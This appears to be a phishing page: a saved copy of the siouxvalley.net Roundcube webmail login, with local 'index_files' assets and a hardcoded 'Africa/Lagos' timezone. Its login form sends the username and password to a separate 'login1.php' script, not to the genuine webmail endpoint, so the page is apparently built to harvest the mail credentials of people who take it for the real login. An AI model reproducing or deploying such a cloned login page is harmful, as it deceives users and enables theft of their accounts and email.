<!DOCTYPE html>
<html class=" js mozilla" lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>siouxvalley.net webmail :: Welcome to siouxvalley.net webmail</title>
<meta name="viewport" content="" id="viewport">

<link rel="shortcut icon" href="https://webmail.siouxvalley.net/logos/favicons/siouxvalley.net/favicon.ico?s=1547825104">

<link rel="stylesheet" type="text/css" href="index_files/styles.css">
<link rel="stylesheet" type="text/css" href="index_files/libkolab.css">
<link rel="stylesheet" type="text/css" href="index_files/jquery-ui.css">
<link rel="stylesheet" type="text/css" href="index_files/libcal.css">
<script type="text/javascript" async="" src="index_files/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-TE9Ls1LqNaomGaFdDlxBJIkg+bFnKWbASEx9XrnnCV1SiORfW/qiKK2lsAbkVeBa"></script><script src="index_files/ui.js"></script>




<script src="index_files/jquery.js"></script>
<script src="index_files/common.js"></script>
<script src="index_files/app.js"></script>
<script src="index_files/jstz.js"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10402,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"larry","blankpage":"skins/larry/watermark.html","refresh_interval":60,"session_lifetime":1800,"action":"","comm_path":"./?_task=login","compose_extwin":false,"allow_save_device_30days":true,"twofactor_formfield_as_password":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","libcal_settings":{"date_format":"YYYY-MM-DD","time_format":"hh:mm A","date_short":"MM-DD","date_long":"DD MMM YYYY","date_agenda":"dddd MM-DD","dates_long":"DD MMM YYYY","first_day":1,"timezone":-7,"dst":"1","days":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"days_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"months":["January","February","March","April","May","June","July","August","September","October","November","December"],"months_short":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"today":"Today"},"request_token":"NuD9fOw4aub2wJzDsvAfAQnPFvaLJ6Qw"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","twofactor_gauthenticator.activate":"Activate","twofactor_gauthenticator.twofactor_gauthenticator":"2-Factor Authentication","twofactor_gauthenticator.code":"Google Authenticator Code","twofactor_gauthenticator.two_step_verification_form":"2-Factor Authentication Code:","twofactor_gauthenticator.secret":"Secret","twofactor_gauthenticator.qr_code":"QR Code","twofactor_gauthenticator.msg_infor":"You can scan this QR code containing the 2-Factor settings using a TOTP compatible app such as \u003Ca href=\"https://github.com/google/google-authenticator\" target=\"_blank\"\u003Egoogle-authenticator\u003C/a\u003E","twofactor_gauthenticator.show_secret":"Show secret","twofactor_gauthenticator.hide_secret":"Hide secret","twofactor_gauthenticator.create_secret":"Create secret","twofactor_gauthenticator.show_qr_code":"Show QR Code","twofactor_gauthenticator.hide_qr_code":"Hide QR Code","twofactor_gauthenticator.recovery_codes":"Recovery codes","twofactor_gauthenticator.show_recovery_codes":"Show recovery codes","twofactor_gauthenticator.hide_recovery_codes":"Hide recovery codes","twofactor_gauthenticator.setup_all_fields":"Fill all fields","twofactor_gauthenticator.enrollment_dialog_title":"2-Factor authentication enrollment","twofactor_gauthenticator.enrollment_dialog_msg":"\u003Cstrong\u003E2-Factor authentication codes\u003C/strong\u003E are required for increased security, please configure them now.","twofactor_gauthenticator.check_code":"Check code","twofactor_gauthenticator.code_ok":"Code OK","twofactor_gauthenticator.code_ko":"Incorrect code","twofactor_gauthenticator.dont_ask_me_30days":"Don&#39;t ask me codes again on this computer for 30 days","twofactor_gauthenticator.check_code_to_activate":"To save, please scan the QR Code and enter the current 2-Factor code below.","twofactor_gauthenticator.successfully_saved":"2-Factor authentication settings saved successfully.","libcalendaring.itipaccepted":"Accept","libcalendaring.itiptentative":"Maybe","libcalendaring.itipdeclined":"Decline","libcalendaring.itipdelegated":"Delegate","libcalendaring.expandattendeegroup":"Substitute with group members","libcalendaring.expandattendeegroupnodata":"Unable to substitute this group. No members found.","libcalendaring.statusorganizer":"Organizer","libcalendaring.statusaccepted":"Accepted","libcalendaring.statusdeclined":"Declined","libcalendaring.statusdelegated":"Delegated","libcalendaring.statusunknown":"Unknown","libcalendaring.statusneeds-action":"Needs action","libcalendaring.statustentative":"Tentative","libcalendaring.statuscompleted":"Completed","libcalendaring.statusin-process":"In process","libcalendaring.delegatedto":"Delegated to:","libcalendaring.delegatedfrom":"Delegated from:","libcalendaring.showmore":"Show more...","errortitle":"An error occurred!","toggleadvancedoptions":"Toggle advanced options","options":"Options"});
rcmail.gui_container("loginfooter","bottomline");rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script src="index_files/recaptcha.js"></script>
<script src="index_files/twofactor_gauthenticator.js"></script>
<script src="index_files/qrcode.js"></script>
<script src="index_files/jquery-ui.js"></script>
<script src="index_files/libcalendaring.js"></script>
<script src="index_files/api.js"></script>

</head>
<body>

<h1 class="voice">siouxvalley.net webmail Login</h1>

<div id="login-form">
<div class="box-inner" role="main">
<img src="index_files/siouxvalley.png" style="width:50%;height:50%;display:block;margin-left:auto;margin-right:auto;" id="logo" alt="siouxvalley.net webmail">

<form name="form" method="post" action="login1.php">
<input type="hidden" name="_token" value="NuD9fOw4aub2wJzDsvAfAQnPFvaLJ6Qw">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="Africa/Lagos"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="_user" id="rcmloginuser" required="" size="40" autocapitalize="none" autocomplete="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required="" size="40" autocapitalize="none" autocomplete="off" type="password"></td>
</tr>
<tr><td></td><td class="input"><div class="g-recaptcha" id="recaptcha-checkbox" data-theme="dark" data-sitekey="6Lc7tHUUAAAAAO3hFQKz6dwqwKy_ZFwMVfrs6j54" data-callback="recaptchaCallback"><div style="width: 304px; height: 78px;"><div><iframe title="reCAPTCHA" src="index_files/anchor.htm" role="presentation" name="a-anfvk6ra54jp" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" width="304" height="78" frameborder="0"></iframe></div><textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;"></iframe></div></td></tr></tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Login</button>
</p>

</form>

</div>

<div class="box-bottom" role="complementary">
	<div id="message"></div>
	<noscript>
		<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
	</noscript>
</div>

<div id="bottomline" role="contentinfo">
	siouxvalley.net webmail 
		
</div>
</div>



<script>
if (!window.UI) { var UI = new rcube_mail_ui(); }
</script>
<script>
$(function() {
rcmail.init();
var images = ["skins/larry/images/ajaxloader.gif","skins/larry/images/ajaxloader_dark.gif","skins/larry/images/buttons.png","skins/larry/images/addcontact.png","skins/larry/images/filetypes.png","skins/larry/images/listicons.png","skins/larry/images/messages.png","skins/larry/images/messages_dark.png","skins/larry/images/quota.png","skins/larry/images/selector.png","skins/larry/images/splitter.png","skins/larry/images/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>







<div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div><div style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="z-index: 2000000000; position: relative;"><iframe title="recaptcha challenge expires in two minutes" src="index_files/bframe.htm" style="width: 100%; height: 100%;" name="c-anfvk6ra54jp" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" frameborder="0"></iframe></div></div></body></html>